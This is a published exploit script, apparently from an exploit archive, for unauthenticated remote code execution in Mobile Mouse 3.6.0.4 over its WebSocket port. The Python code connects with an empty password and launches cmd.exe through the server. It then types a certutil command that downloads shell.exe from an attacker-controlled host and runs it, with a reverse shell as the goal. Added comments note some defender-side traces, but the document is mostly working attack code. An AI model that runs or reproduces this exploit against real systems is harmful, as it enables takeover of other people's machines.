## https://sploitus.com/exploit?id=PACKETSTORM:201226
# Exploit Title: Mobile Mouse 3.6.0.4 WebSocket Remote code execution
    # Date: 06/17/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://mobilemouse.com/
    # Software Link: https://www.mobilemouse.com/downloads/setup.exe
    # Version: 3.6.0.4
    # Tested on: Windows 10 (Build 19044)
    
    
    '''
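    Mobile Mouse 3.6.0.4 contains a critical remote code execution
    vulnerability reachable through its WebSocket interface. The script
    below proceeds only when the server accepts a CONNECT message with an
    empty password field; it aborts if the server asks for a password.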
    '''
    
    
    #!/usr/bin/env python3
    
    import asyncio
    import websockets
    import uuid
    from time import sleep
    import sys
    
    
    # Both addresses are RFC 1918 private (lab) addresses.
    # target_ip/port: the Mobile Mouse server's WebSocket listener. The listing
    # calls 35913 the default port, which makes it the port to restrict or watch.
    target_ip = "192.168.8.105"
    port = 35913  # default port
    uri = "ws://" + target_ip + ":" + str(port)

    # lhost/payload: HTTP host and file name that appear in the command line
    # sent by exploit().
    lhost = "192.168.8.100"
    payload = "shell.exe"

    # Message framing used by exploit(): 0x1E (ASCII Record Separator) between
    # fields, 0x04 (ASCII End of Transmission) at the end of a message.
    EOR_CHAR = chr(0x1E)
    EOF_CHAR = chr(0x04)
    
    async def exploit():
        """Send the CONNECT handshake and the three follow-up messages of this PoC.

        Sequence, as written below:

        1. Open a plain ``ws://`` connection to ``uri``.
        2. Send a CONNECT message with an empty password field and wait up to
           5 seconds for the reply. A reply containing "Please enter a password"
           ends the script with exit status 0; a timeout or other error ends it
           with status 1; any other reply is printed and the script carries on.
        3. Send SENDPROGRAMACTION / RUN for ``cmd.exe``.
        4. Send a KEY message whose text is a ``certutil`` download of
           ``http://{lhost}/{payload}`` to ``C:\\Windows\\Temp\\payload.exe``
           followed by running that file, then a KEY / ENTER message.

        Nothing is read from the socket after step 2, so the final "[+]" lines
        report that messages were sent, not that anything ran on the target.

        Defender view, limited to what this listing shows: the path depends on
        the server accepting an empty password; the traffic is unencrypted
        WebSocket on the configured port; the host-side traces would be a
        cmd.exe launch requested through the server, a
        ``certutil -urlcache -split -f`` command line with an http URL, and an
        executable at ``C:\\Windows\\Temp\\payload.exe``.
        """
        async with websockets.connect(uri) as ws:
            print("[+] WebSocket connected")
    
    
            # CONNECT fields. The names are the PoC author's labels; how the
            # server interprets each one is not shown in this listing.
            field1 = ""  # password if known
            # Fresh random GUID on every run, so the GUID value itself is not a
            # stable indicator to match on.
            field2_guid = str(uuid.uuid4()).upper()
            field3_device_type = "Desktop"
            field4_version1 = "2"
            field5_version2 = "2"
            # 32 zero bytes inside a "{length=..,bytes=0x..}" wrapper.
            field6_version3_key = "{length=32,bytes=0x" + "00" * 32 + "}"
    
            # The verb plus six fields, joined by EOR_CHAR and closed by EOF_CHAR.
            connect_message = (
                f"CONNECT{EOR_CHAR}"
                f"{field1}{EOR_CHAR}"
                f"{field2_guid}{EOR_CHAR}"
                f"{field3_device_type}{EOR_CHAR}"
                f"{field4_version1}{EOR_CHAR}"
                f"{field5_version2}{EOR_CHAR}"
                f"{field6_version3_key}{EOF_CHAR}"
            )
    
            await ws.send(connect_message)
            print(f"[>] Connecting ...")
    
            # Single read with a 5 s timeout; the reply may arrive as bytes or str.
            try:
                response = await asyncio.wait_for(ws.recv(), timeout=5)
                decoded = response.decode("utf-8", errors="ignore") if
    isinstance(response, bytes) else response
                decoded = decoded.strip()
    
                if "Welcome" in decoded:
                    print("[+] CONNECT accepted by server.")
                elif "Please enter a password" in decoded:
                    # A configured password stops the script here. SystemExit is
                    # not an Exception subclass, so the handler below does not
                    # swallow it.
                    print("[!] Server requires a password. Aborting.")
                    sys.exit(0)
                else:
                    # Any other reply is only reported; execution continues.
                    print(f"[!] Unexpected response: {repr(decoded)}")
            except Exception as e:
                print(f"[!] No response after CONNECT: {e}")
                sys.exit(1)
    
            # Fixed delay before the first command message.
            await asyncio.sleep(3)
    
            # Program-launch message naming cmd.exe; presumably the server starts
            # the named program on the host (inferred from the message name).
            cmd = "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"
            await ws.send(cmd)
            # Blocking time.sleep (not asyncio.sleep): the event loop is stalled
            # for these 3 seconds.
            sleep(3)
    
            # KEY message carrying a command line as text: certutil fetches
            # http://{lhost}/{payload} into C:\Windows\Temp\payload.exe and the
            # file is then started. The meaning of the numeric field (116) is not
            # shown in this listing.
            command_payload = f"KEY\x1e116\x1ecertutil -urlcache -split -f
    http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe &
    C:\\Windows\\Temp\\payload.exe\x1e\x04"
            await ws.send(command_payload)
    
            print("[+] reverse shell payload sent")
    
            # KEY message with ENTER; the -1 field is likewise unexplained here.
            execute = "KEY\x1e-1\x1eENTER\x1e\x04"
            await ws.send(execute)
    
            # Printed unconditionally: no reply is read to confirm execution.
            print("[+] Payload executed, check your listener!")
    
    
    # Module-level call with no __main__ guard: the connection attempt starts
    # as soon as this file is executed or imported.
    asyncio.run(exploit())